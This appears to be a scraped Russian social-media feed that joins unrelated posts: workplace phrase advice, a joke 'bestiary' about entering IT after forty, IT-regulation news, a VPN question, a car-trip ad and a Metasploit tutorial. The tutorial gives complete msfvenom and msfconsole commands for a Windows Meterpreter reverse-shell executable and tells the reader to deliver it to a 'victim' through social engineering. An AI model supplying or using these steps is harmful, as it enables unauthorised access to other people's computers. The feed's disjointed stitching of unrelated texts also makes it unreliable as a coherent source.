7 фраз, которые нужно выбросить из своего лексикона, если хотите стать отпадным специалистом
Фразы, о которых мы сегодня поговорим, — это база. Только такая, которую знать не следует. Своеобразный парадокс, да, но и тому есть объяснение: это фразы-паразиты, которые только вредят вашему образу в глазах заказчика или работодателя.
Фраза №1 “Это невозможно”
Двоякая фраза. Да, есть люди, которые не слишком в теме развития технологий, и они могут попросить вас, к примеру, создать “Глаз Бога” из “Форсаж 7” — хакерской системы, способной отследить любого в реальном времени. Пока что это возможно лишь гипотетически, но не практически.
Другой случай, если вы говорите “это невозможно” на очень сложную, но реальную задачу. И вы так говорите, потому что вам лень искать решение, а потом ещё и долго работать.
Вместо этой фразы вы можете сказать “Дайте мне время”, а после воспользоваться этим временем, чтобы погуглить, обсудить задачу с коллегами или найти альтернативу.
Фраза №2 "Я не знаю"
А о таких словах нужно вообще забыть в первую очередь, потому что фраза “я не знаю” = “я не хочу”. Не хочу учиться, не хочу вникать в тему, не хочу этим заниматься — много чего. Поэтому запомните: нет фразы “я не знаю”, есть фраза “я не хочу”.
Но если вы действительно не знаете, признайтесь в этом, но скажите следующее:
“Я пока не знаю, как это сделать, но буду разбираться, поэтому дайте мне время”. И, кстати, не забудьте добавить, что вы готовы усердно работать и изучать новые вещи. Это покажет вашу готовность к саморазвитию и росту в профессиональном плане. Быть открытым к обучению и новым знаниям — это не только здорово, но и необходимо для успешной карьеры.
Фраза №3 "Это не моя обязанность"
А вот эта фраза, как красная тряпка для быка, когда речь идет о взаимоотношениях с работодателем или заказчиком. Вместо того чтобы говорить "Это не моя обязанность", лучше проявить инициативу и готовность помочь. Скажите что-то вроде:
"Хорошо, но дайте мне время, и я сделаю все возможное”.
Вообще фраза “дайте мне время” — универсальный ответ для всего. Проверено.
И такой подход покажет вашу ответственность и готовность взять на себя дополнительные задачи, что оценят как работодатели, так и заказчики. Ведь в бизнесе ценится не только выполнение своих прямых обязанностей, но и готовность помогать в решении любых задач для общего успеха.
Фраза №4 "Я сейчас занят"
Эти слова могут показаться не очень учтивыми. Лучше сказать то, что выразит ваше уважение и готовность помочь:
"Сейчас у меня другая задача, но, как только я завершу её, тут же помогу, хорошо?”.
Звучит не только тактично, но и выражает ваш профессионализм.
Фраза №5 "У меня не получается"
Если честно, звучит по-детски. Вы же не тот самый капризный малыш из детсада, у которого не получается сделать поделку из шишек? Вы — взрослый человек, который находится на работе и получает за это деньги. Если у вас что-то не получается, старайтесь, учитесь, пробуйте разные подходы.
Да, придется посидеть, подумать, потратить больше времени, чем обычно… Но вы справитесь. Уверены на 100%.
Фраза №6 "Это не мой стиль"
А вот это странно. Во-первых, потому что звучит как отговорка, а во-вторых, сразу кажется, что вы просто не можете выполнить задачу или соответствовать требованиям.
Вместо того чтобы ссылаться на “ваш стиль”, лучше обсудить, как вы можете адаптироваться или научиться делать что-то новое. Объясните, что предложенный подход кажется не совсем эффективным, но вы готовы рассмотреть альтернативные варианты и найти решение.
Такой ответ покажет вашу гибкость и готовность работать над собой и над достижением общих целей, вместо того чтобы ограничиваться собственными предпочтениями.
Фраза №7 "Это всегда так делалось"
Если вы работаете в разработке, да и не только, то забудьте эту фразу. Ни к чему хорошему она вас не приведет.
Прогресс не стоит на месте. Поэтому то, что “всегда так делалось”, не может продолжать так делаться вечно. Эти слова только подчеркивают консервативный подход, а люди, которые его придерживаются не хотят развиваться и мыслить шире. А это уже “ред флаг”.
Говорят, если гуманитарий пройдет это головоломку до конца, он может считать себя технарем
А еще получит ачивку в профиль. Рискнете?
Бестиарий сорокалетних
Приветствую всех Пикабушников! От вас пришло много вопросов по типу: Можно ли ворваться в IT в 45, в 32 и т.д. Если отвечать кратко - да, можно.
Но на вашем пути из-за вашего возраста вас будут ждать 4 кровожадных демона, которые сьедят вашу душу и собьют с пути. Давайте я вам о них расскажу и, мы вместе подумаем, как вы сможете их одолеть.
1. Опытарот
Демон имеет длинное тело, уходящее в небо, и надменный взгляд. Когда вы хотите открыть учебник или посмотреть курс, он шепчет вам с высока: "Ты уже прожил много лет и гораздо лучше молодых понимаешь, что нужно рынку и людям. Ты чувствуешь и понимаешь то, о чём они даже не догадываются. Ты овладел десятками навыков и запросто всё осилишь".
Вы чувствуете себя уже достойными всего, айти буквально на вытянутый руке. Осталось только взять. Зачем прилагать усилия, если это уже ваше? Вы бы взяли, просто пока не хотите.
2. Кашалит
Эта тварь выползает из ближайшего куста и больше похожа на лужу, вглядываясь в которую, вы обнаруживаете себя частью это тягучей слизи. Она попадается тем, кто обладает достаточной скромностью, чтобы не вестись на опытарота.
Глядя на Кашалита, вы слышите грузный голос у себя в голове: "Голова уже не молодая, я ничего не пойму, мозг уже старый а в голове одна каша".
3. Многоликий Обездоленный
Переступив через унылую лужу, вы обязательно пройдёте мимо пещеры стенаний, в которой сидит Многоликий Обездоленный. Он взывает к вашей совести голодными голосами обездоленных сироток. И сделать нужно лишь одно: взять кирку у входа и уйти в пещеры ломать камни ради корки хлеба для этих несчастных.
Ведь вы кормилец мира. Если не вы, то пропадут и кошечки, и собачки.
4. Справедливий
Отойдя от пещеры, в которой сидит заплывший жиром Обездоленный, отъевшийся на чужом труде. Вы почти достигли цели, но вас ждёт последнее испытание.
На горизонте вы увидите юношу, который собирает щедрый урожай с золотого поля. У него в руках дорого украшенная коса, а по полю то туда, то сюда шныряют здоровые слуги, помогающие ему.
В дали вы замечаете его, Доколия. Он сидит в тени в дорогом кресле и отсылает свои дары своему сыну, который пожинает.
Вас разбивает непонятное чувство, когда вы видите, что рядом клочок земли, весь в сорняках, хилая мотыга и мешок с семенами.
И чувство бьёт колоколом по вискам, когда вы понимаете, что этот клочок теперь ваш. Вот вы у цели. Осталась самая малость.
Metasploit
Metasploit Framework - это мощный инструмент, который может быть использован как злоумышленниками, так и этичными хакерами и специалистами по тестированию на проникновение для исследования уязвимостей в сетях и на серверах.
Проект Metasploit был создан на языке Perl в 2003 году Эйч Ди Муром (H.D. Moore) при содействии основного разработчика Мэтта Миллера для использования в качестве портативного сетевого инструмента. Он был полностью переведен на язык Ruby к 2007 году, а в 2009 году лицензию приобрела Rapid7, и теперь этот инструмент остается частью ассортимента этой компании, специализирующейся на разработке систем обнаружения вторжений и инструментов эксплуатации уязвимостей систем удаленного доступа.
Этот фреймворк стал основным инструментом разработки эксплойтов. До Metasploit пентестерам приходилось выполнять все проверки вручную, используя различные инструменты, которые могли поддерживать или не поддерживать тестируемую платформу, а также вручную писать собственный код для эксплуатации уязвимостей.
Основными компонентами инструмента являются эксплойты и пэйлоады.
Эксплойт - это код, который эксплуатирует ошибку, неверную настройку или системный сбой — любую брешь в защите. Эксплойт помогает найти ее, а потом воспользоваться, чтобы получить контроль над целевой системой. Создавать эксплойты лучше самостоятельно, но с Metasploit это быстрее и проще. Во фреймворке есть образцы готового кода.
Пэйлоады. Когда эксплойт получает доступ к системе, выполняется определенный код. Его называют пэйлоадом, или полезной нагрузкой. Обычно это шелл-код — команды, написанные на языке оболочки операционной системы, то есть для консоли ОС. Пэйлоад нужен, чтобы установить соединение, запустить вредоносный код или выполнить другую операцию.
Дополнительные модули Metasploit позволяют просканировать сеть и проанализировать трафик, который через нее идет. Это необходимо на начальном этапе атаки — так пентестер получает информацию, нужную для проникновения.
В состав фреймворка входят:
библиотеки — в первую очередь библиотека Rex для основных операций. На ней базируются другие — MSF Core и MSF Base. Вместе они составляют основное ядро команд Metasploit;
модули — эксплойты, пэйлоады и прочие, о которых рассказывали выше;
инструменты — дополнительное ПО для работы;
вспомогательные плагины;
интерфейсы — то, с помощью чего пользователь взаимодействует с Metasploit. По умолчанию это доступ через консоль или CLI — консольное приложение. Можно установить или настроить графический интерфейс.
MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.
Reverse TCP (обратное подключение, обратный шелл, пэйлоад) — схема взаимодействия с целевым компьютером. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или обратный шелл.
Чтобы узнать, какие полезные нагрузки доступны введите команду:
msfvenom -l payloads
Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.
LHOST — IP-адрес вашего компьютера (атакующего).
LPORT — порт вашего компьютера, который назначен серверу или программе.
P — сокращение от «payload», полезная нагрузка для выбранной платформы.
F — параметр, который задает тип файла, например, exe для Windows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o payload.exe
Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:
msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run
Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.
После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.
После запуска созданного файла откроется сессия Meterpreter:
Поздравляю, вы получили доступ к компьютеру.
Информация предоставлена для информационных целей.
Давайте посчитаем
Мораторий на проверку IT-компаний в России завершен, пора проверить ценообразование в сфере цифровизации, заявил глава Счетной палаты Борис Ковальчук
В марте правительство отменило мораторий на антимонопольные проверки IT-компаний, который действовал с весны 2022 года.
Как отмечали в Минцифры, отмена моратория коснется небольшого количества организаций, имеющих цифровую платформу, долю сделок покупателей и продавца свыше 35% от всех транзакций рынка и выручку более 2 млрд рублей, напоминает RT.
ФАС сообщила о «большом количестве жалоб» бизнеса и потребителей на доминирующие компании, проверки которых невозможны из-за запрета.
Источники:
https://turbo.ria.ru/kovalchuk-1946108946.html
https://rbc-ru.turbopages.org/turbo/rbc.ru/s/business/15/05/...
http://publication.pravo.gov.ru/document/0001202403200030?in...
https://www.rbc.ru/business/20/03/2024/65fb19f49a794704d80b7...
https://finance.rambler.ru/business/52759712-glava-schetnoy-...
https://russian.rt.com/russia/news/1288953-pravitelstvo-mora...
https://fas.gov.ru/news/33158
Браузерный VPN и роутерный VPN одновременно
Хей, нужно узнать, будет ли браусерный/ програмнный VPN считывать информацию сети из роутерного VPN'а, если такой подключен, или от моего инет провайдера?
Спасибо.
Как подготовить машину к долгой поездке
Взять с собой побольше вкусняшек, запасное колесо и знак аварийной остановки. А что сделать еще — посмотрите в нашем чек-листе. Бонусом — маршруты для отдыха, которые можно проехать даже в плохую погоду.